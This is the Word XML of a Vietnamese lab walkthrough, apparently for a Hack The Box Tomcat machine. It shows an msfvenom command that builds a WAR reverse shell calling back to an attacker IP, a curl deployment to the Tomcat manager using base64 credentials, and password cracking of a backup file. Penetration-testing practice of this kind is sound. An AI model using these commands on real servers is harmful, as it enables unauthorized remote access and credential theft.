          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="181784C5" w14:textId="25948CC1" w:rsidR="009663EA" w:rsidRDefault="009663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tưởng 403 hạn chế truy cập nhưng không phải. Nếu role là manager-gui mới được truy cập giao diện /manager, còn manager-script được phép truy cập text interface và trang status</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE8925E" w14:textId="6487C900" w:rsidR="004D5819" w:rsidRDefault="0067411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Trang status:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165E9CEC" w14:textId="4F759B38" w:rsidR="0067411C" w:rsidRDefault="0067411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4CB468" wp14:editId="5B8D2D21">
            <wp:extent cx="5279923" cy="3035757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80" t="18263" r="3870"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5280911" cy="303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09CB1" w14:textId="77181AF9" w:rsidR="004F1C97" w:rsidRDefault="004F1C97">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44F8FDA0" w14:textId="2008EC5C" w:rsidR="0067411C" w:rsidRDefault="004F1C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/text cho phép chúng ta thực thi lệnh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF7B08D" w14:textId="4E36406A" w:rsidR="0067411C" w:rsidRDefault="00C105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9734E3" wp14:editId="0EFD21DE">
            <wp:extent cx="5943600" cy="1786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20D0F" w14:textId="70CBB729" w:rsidR="00590EC1" w:rsidRDefault="00590EC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="523EA15F" w14:textId="304C0AB0" w:rsidR="00590EC1" w:rsidRDefault="00590EC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cần reverse shell trong tập tin WAR.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7042E0A5" w14:textId="50B10A8F" w:rsidR="00590EC1" w:rsidRDefault="00590EC1">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32EEEA17" w14:textId="25DF9D57" w:rsidR="00590EC1" w:rsidRPr="00E32AF4" w:rsidRDefault="008A3776">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>msfvenom -p java/shell_reverse_tcp lhost=10.10.16.3 lport=1234 -f war -o pwn.war</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA3CF27" w14:textId="77777777" w:rsidR="00594ACA" w:rsidRDefault="00594ACA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1464F26E" w14:textId="2D66701C" w:rsidR="008A3776" w:rsidRDefault="00594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DE7AB60" wp14:editId="018F3E3C">
            <wp:extent cx="5943600" cy="837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3240" w14:textId="77777777" w:rsidR="00594ACA" w:rsidRDefault="00594ACA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="656943A5" w14:textId="6F53328D" w:rsidR="008A3776" w:rsidRDefault="008A37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Sau đó tải lên tập tin war:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753117BF" w14:textId="7768ECE0" w:rsidR="008A3776" w:rsidRDefault="008A3776">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F543C32" w14:textId="06386A2C" w:rsidR="008A3776" w:rsidRDefault="00876D66">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">curl -v </w:t>
      </w:r>
      <w:r w:rsidR="00E32AF4" w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-H "Authorization: Basic dG9tY2F0OiQzY3VyZVA0czV3MHJkMTIzIQ=="</w:t>
      </w:r>
      <w:r w:rsidR="00BF75F2" w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> --</w:t>
      </w:r>
      <w:r w:rsidR="00645801" w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>upload-file pwn.war</w:t>
      </w:r>
      <w:r w:rsidR="00E32AF4" w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00645801" w:rsidRPr="00E32AF4">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"http://10.10.10.194:8080/manager/text/deploy?path=/foo&amp;update=true"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62587D1F" w14:textId="77C4F31D" w:rsidR="00645801" w:rsidRDefault="00645801">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59AF8C1B" w14:textId="3D4DC777" w:rsidR="00645801" w:rsidRDefault="00594AC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0D6220" wp14:editId="44400A66">
            <wp:extent cx="5943600" cy="18148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A03E2" w14:textId="179066C2" w:rsidR="00E32AF4" w:rsidRDefault="00E32AF4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19C2ECE8" w14:textId="71189B4B" w:rsidR="00B84810" w:rsidRPr="00B84810" w:rsidRDefault="00B84810">
      <w:pPr>
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B84810">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>curl http://10.10.10.194:8080/foo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="299F5EC3" w14:textId="580A80E9" w:rsidR="00E32AF4" w:rsidRDefault="00B8481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FB56FE" wp14:editId="289FDA8F">
            <wp:extent cx="3962400" cy="635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03D71" w14:textId="7241E6DF" w:rsidR="00B84810" w:rsidRDefault="00B84810">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6542FC82" w14:textId="1357774A" w:rsidR="00B84810" w:rsidRDefault="00146F4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82CE8F1" wp14:editId="7CA2F9D6">
            <wp:extent cx="5943600" cy="1689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FEC4" w14:textId="0545777A" w:rsidR="00146F4B" w:rsidRDefault="00146F4B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="550547BB" w14:textId="18DEDD3F" w:rsidR="00146F4B" w:rsidRPr="00995C1F" w:rsidRDefault="00995C1F">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00995C1F">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Privilege Escalation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38DA87BD" w14:textId="32962CEF" w:rsidR="00995C1F" w:rsidRDefault="00995C1F">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="553534CC" w14:textId="77777777" w:rsidR="00B45BDB" w:rsidRDefault="00B4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kiếm các tập tin nhạy cảm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D3F2AE" w14:textId="77777777" w:rsidR="00B45BDB" w:rsidRDefault="00B45BDB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4646AD68" w14:textId="29CD5A28" w:rsidR="00995C1F" w:rsidRDefault="00B4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ở cổng 80: /var/www/html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B91FC6" w14:textId="360A9CC8" w:rsidR="00B45BDB" w:rsidRDefault="00B45BD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ở cổng 8080: /var/lib/tomcat9/webapps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502D8550" w14:textId="00EF6AF5" w:rsidR="00B45BDB" w:rsidRDefault="00B45BDB">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BE6F17F" w14:textId="45C7F31C" w:rsidR="00134832" w:rsidRDefault="0013483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được tập tin sao lưu:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EB945A3" w14:textId="22C66658" w:rsidR="00B45BDB" w:rsidRDefault="0013483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14AC4E0" wp14:editId="376D8E0D">
            <wp:extent cx="5943600" cy="23825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10A66" w14:textId="3008A906" w:rsidR="00134832" w:rsidRDefault="00134832">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2C75B5" w14:textId="15D0A03D" w:rsidR="00134832" w:rsidRDefault="0013483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Tải nó về máy cục bộ để xử lý:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6679D641" w14:textId="7F9FF469" w:rsidR="00134832" w:rsidRDefault="002D7AF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036D09" wp14:editId="2E372D46">
            <wp:extent cx="5943600" cy="16490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05F73" w14:textId="3FEDDCDE" w:rsidR="002D7AF7" w:rsidRDefault="002D7AF7">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="233F0339" w14:textId="7F8CB21A" w:rsidR="007D3704" w:rsidRDefault="007D370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Tệp sao lưu được bảo vệ bằng mật khẩu, mình có thể bẻ khóa bằng john</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4ED0EF" w14:textId="306FC3B1" w:rsidR="002D7AF7" w:rsidRDefault="007D37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CFB2DC" wp14:editId="1F133BE7">
            <wp:extent cx="5943600" cy="1494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333EB" w14:textId="57DB974F" w:rsidR="008222F4" w:rsidRDefault="008222F4">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E48A2D8" w14:textId="6CFFD914" w:rsidR="008222F4" w:rsidRDefault="00F44F98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A95FC1">
        <w:rPr>
          <w:color w:val="8EAADB" w:themeColor="accent1" w:themeTint="99"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin@it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E37D704" w14:textId="2F408CF2" w:rsidR="00F44F98" w:rsidRDefault="00F44F98">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DA3CFDD" w14:textId="00CB9ACA" w:rsidR="00F44F98" w:rsidRDefault="00F44F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CC2E93" wp14:editId="1DFDE40B">
            <wp:extent cx="4241800" cy="1079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6043" w14:textId="73AB7FF1" w:rsidR="00F44F98" w:rsidRDefault="0035764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B2C710" wp14:editId="048B6B99">
            <wp:extent cx="3302000" cy="596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4151" w14:textId="6AC8663D" w:rsidR="00357646" w:rsidRDefault="00357646">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="250730F1" w14:textId="146BCF2B" w:rsidR="003156F5" w:rsidRDefault="003156F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Người dùng ash nằm trong</w:t>
      </w:r>
      <w:r w:rsidR="0068063A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nhóm</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> lxd có thể leo thang đặc quyền</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B79AD7" w14:textId="4CA48A20" w:rsidR="00357646" w:rsidRDefault="003156F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4588DF" wp14:editId="5EF7FD97">
            <wp:extent cx="5943600" cy="4438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C344" w14:textId="2B76F925" w:rsidR="00C44C32" w:rsidRDefault="00C44C32">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E40DA6F" w14:textId="6BEA16F7" w:rsidR="00C44C32" w:rsidRDefault="003802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Khai thác nhóm lxd không tương thích với hệ điều hành có chip arm</w:t>
      </w:r>
      <w:r w:rsidR="0068063A">
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> nên mình sẽ dừng lại ở đây.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E800515" w14:textId="604FBA23" w:rsidR="0068063A" w:rsidRDefault="0068063A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6DA4C3CD" w14:textId="77777777" w:rsidR="0068063A" w:rsidRPr="007E1007" w:rsidRDefault="0068063A">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="0068063A" w:rsidRPr="007E10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1478"/>
    <w:rsid w:val="0002617C"/>
    <w:rsid w:val="000B57D8"/>
    <w:rsid w:val="00134832"/>
    <w:rsid w:val="00142FEE"/>
    <w:rsid w:val="00146F4B"/>
    <w:rsid w:val="001D2912"/>
    <w:rsid w:val="002230F8"/>
    <w:rsid w:val="002D7AF7"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="003156F5"/>
    <w:rsid w:val="00357646"/>
    <w:rsid w:val="00380222"/>
    <w:rsid w:val="00414EAB"/>
    <w:rsid w:val="0044142A"/>
    <w:rsid w:val="0049253B"/>
    <w:rsid w:val="00492BC6"/>
    <w:rsid w:val="004D5819"/>
    <w:rsid w:val="004F1C97"/>
    <w:rsid w:val="0054118A"/>
    <w:rsid w:val="00590EC1"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00594ACA"/>
    <w:rsid w:val="00595B39"/>
    <w:rsid w:val="00597014"/>
    <w:rsid w:val="005F77F1"/>
    <w:rsid w:val="0061506F"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="00645801"/>
    <w:rsid w:val="0067411C"/>
    <w:rsid w:val="0068063A"/>
    <w:rsid w:val="006E2623"/>
    <w:rsid w:val="00707618"/>
    <w:rsid w:val="007733D6"/>
    <w:rsid w:val="007907EA"/>
    <w:rsid w:val="007B6254"/>
    <w:rsid w:val="007D3704"/>
    <w:rsid w:val="007E1007"/>
    <w:rsid w:val="008222F4"/>
    <w:rsid w:val="00837B26"/>
    <w:rsid w:val="008763C2"/>
    <w:rsid w:val="00876D66"/>
    <w:rsid w:val="008927AA"/>
    <w:rsid w:val="008A3776"/>
    <w:rsid w:val="00901689"/>
    <w:rsid w:val="009334E5"/>
    <w:rsid w:val="00955B94"/>
    <w:rsid w:val="009663EA"/>
    <w:rsid w:val="00995C1F"/>
    <w:rsid w:val="009A5AA9"/>
    <w:rsid w:val="009E3185"/>
    <w:rsid w:val="009F2663"/>
    <w:rsid w:val="00A40DA1"/>
    <w:rsid w:val="00A8539D"/>
    <w:rsid w:val="00A95FC1"/>
    <w:rsid w:val="00B22803"/>
    <w:rsid w:val="00B45BDB"/>
    <w:rsid w:val="00B8098C"/>
    <w:rsid w:val="00B84810"/>
    <w:rsid w:val="00BB21A9"/>
    <w:rsid w:val="00BC4BDC"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF75F2"/>
    <w:rsid w:val="00C105AA"/>
    <w:rsid w:val="00C247AB"/>
    <w:rsid w:val="00C44C32"/>
    <w:rsid w:val="00C925DB"/>
    <w:rsid w:val="00CD1E54"/>
    <w:rsid w:val="00E2631C"/>
    <w:rsid w:val="00E32AF4"/>
    <w:rsid w:val="00EC3DE6"/>
    <w:rsid w:val="00ED1478"/>
    <w:rsid w:val="00F05875"/>
    <w:rsid w:val="00F44F98"/>
    <w:rsid w:val="00FA7A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4B728DC"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{619B2CB9-087A-E644-897E-431FF2E70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10</Pages>
  <Words>374</Words>
  <Characters>2135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62</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-01-19T03:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-01-19T17:36:00Z</dcterms:modified>
</cp:coreProperties>
</file>